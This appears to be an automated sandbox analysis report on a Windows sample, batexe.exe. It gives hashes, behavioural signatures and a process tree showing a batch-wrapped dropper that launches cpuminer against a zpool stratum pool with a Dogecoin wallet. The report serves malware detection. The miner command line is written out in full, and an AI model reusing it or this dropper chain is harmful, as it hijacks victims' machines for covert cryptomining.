Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
303s -
max time network
307s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 13:28
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4780 b2e.exe 5396 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 5396 cpuminer-sse2.exe 5396 cpuminer-sse2.exe 5396 cpuminer-sse2.exe 5396 cpuminer-sse2.exe 5396 cpuminer-sse2.exe 5396 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1792-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1792 wrote to memory of 4780 1792 batexe.exe 85 PID 1792 wrote to memory of 4780 1792 batexe.exe 85 PID 1792 wrote to memory of 4780 1792 batexe.exe 85 PID 4780 wrote to memory of 456 4780 b2e.exe 86 PID 4780 wrote to memory of 456 4780 b2e.exe 86 PID 4780 wrote to memory of 456 4780 b2e.exe 86 PID 456 wrote to memory of 5396 456 cmd.exe 89 PID 456 wrote to memory of 5396 456 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\438C.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5396
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
988KB
MD5b7ecdaf4a609a769f85bdc49118ba0f5
SHA18e1361e7d2a90839672787df82b743f6c9b25867
SHA256c888befd0ce50f4acdc66ab6d21bf73f16f0e0e05d8b47bfba79a39b663db363
SHA512bfce346f7d442dc27ee62a70a9ad6f67dd2a17b2b2fde6fc6cd77204a96216a89dcdae042165ea3a396cbe8746d51ce87a148ba6912c967081edf76e6b0de24d
-
Filesize
2.1MB
MD5c65046109eeacc05c12e1d2d47bbcdce
SHA1f684b885a159684fdc5f276d2e97f1f62e656147
SHA2563de769cb77e6c4e7be2f7c2683b6e3a7f58f7cd8261f25cd14c868163a5f82fc
SHA512a0bd72ec5132d11f00120b161c4df1aa93f734dcf9d9b9bb1eda51f96a74a69276aaec7e8cf1fcb762362e887569ad4cb2dbd40aaf541141dfb1ffb7eb51d2dd
-
Filesize
2.3MB
MD57e118ee82c731a138d2c0ffe58f39bb3
SHA1f0535a0081fe4f5520f213261ab48ccd2a76240a
SHA256ac9a081e1e5dc85d5fb27a89ba974d48c0b983b3a43adf197381be8694448123
SHA5123cef77c1a9f445e7dc4d857284520af0fa6c439de0c7dfd6fb74b817e99bb540d031984a99fa4b55401dd5c04ad2ba1b39c93d929fc528e54a7f51beccea5727
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.3MB
MD52ed74b47e09142aa65566bf462b3f6da
SHA163a025ed43f7b2cdec91b7e4e901d5dff0b0b300
SHA2569c3ff15f979c2fcfa08be3b394f390654f74e7aeaada9df754e37c41de085c2b
SHA512389088c4572aa6a41af748ec82f0d575df4730015311fc47735800b12f03b49eaf5db84210942c28e3cbbdbedaf28bab228abfa1fd4f34b72d72bc0ef65fe183
-
Filesize
405KB
MD598dde509a490804eaebf0dbaf8d93d1b
SHA10a14061187f29fa065aef58e31315889c212cc26
SHA256be471a02a6df375adaba9ef11866ddc6f17705e8bb913c6b67db5235bcd45390
SHA51274649f1ea88b7a92c4b8eef67f5e578aeeb239e29efb47256128f739b4844288961a7697cc39453536eaa6336f1a7155a5f731ecb3e06529d672bd5dc32af05d
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.2MB
MD54fe81e9d1694b2e2b68b268dae73997f
SHA1d4a485b8660e7bf3add3ee7b144986b0d65c1ef6
SHA2560822cf685cafd115eb454a76ce889fb02ec8bff984a8605c5a7cefb274e45c06
SHA512434901e2574b33ff977ffd2f5657e57ffd08b6378691a9599842991536e7320491467f9161c7cdb1c494cf870ff813ea016e7a2aa4ba8682e9657566ecb4c513
-
Filesize
1.1MB
MD57745843f085cb1d08c2a03ee7bbd340a
SHA16e2e606b29d3a0587419799810f82cd401135033
SHA2566e55364035d8a81919c03dc3adf7ca50ebe8e01b89487f9468cbadde47969ac2
SHA512466a36f5b2c30ddcedf57781253e50cb3763580b1c1c7a64342f18a7f262efc551d395cb3efeb3ca347575041fa32763032011d6acb4d99c368157bd5ebd3363
-
Filesize
1.3MB
MD57d0ef0d149195f962fc3bace4a8a5be0
SHA102ad639d2e55111e238ef1321782988a5a0c4c31
SHA256e98b629f95ad75765a272749f3a8f4cb5e6946e3122f9e45a902ab7be3c9856a
SHA512a5ae6cad6d533c23dd970e4b6044ad43c75317e47d3fb06febae3c70ce280d1797e9310e923abc8a6e7e866ce12242bd088f65d48e5cc32b253ceedcb2825048
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770